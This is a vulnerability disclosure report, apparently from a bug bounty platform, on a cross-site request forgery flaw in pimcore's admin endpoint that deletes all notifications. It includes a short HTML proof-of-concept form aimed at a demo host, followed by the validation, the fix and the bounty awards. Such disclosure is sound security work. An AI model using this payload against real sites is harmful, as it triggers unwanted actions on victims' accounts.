Cross-Site Request Forgery (CSRF) in pimcore/pimcore

Valid

Reported on

Jul 30th 2021

✍️ Description

Your application have not any CSRF protection and also You set the SameSite attribute to Lax, this means if you want to alter some data with GET HTTP requests, then your site should be vulnerable to CSRF attacks with no doubt.

First you run this Html payload and then you should see that the all notifications been deleted .

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://x.pimcore.fun/admin/notification/delete-all">
<input type="hidden" name="&#95;dc" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

I test this Payload on both stable and dev Editions.(on x.pimcore.fun)

💥 Impact

This vulnerability is capable of delete any notification only with one click.

Occurrences

Mail.php L1

We have contacted a member of the pimcore team and are waiting to hear back 2 years ago

Bernhard Rusch validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Bernhard Rusch marked this as fixed with commit 80713c 2 years ago

Bernhard Rusch has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the pimcore team and are waiting to hear back 2 years ago

Bernhard Rusch validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Bernhard Rusch marked this as fixed with commit 80713c 2 years ago

Bernhard Rusch has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation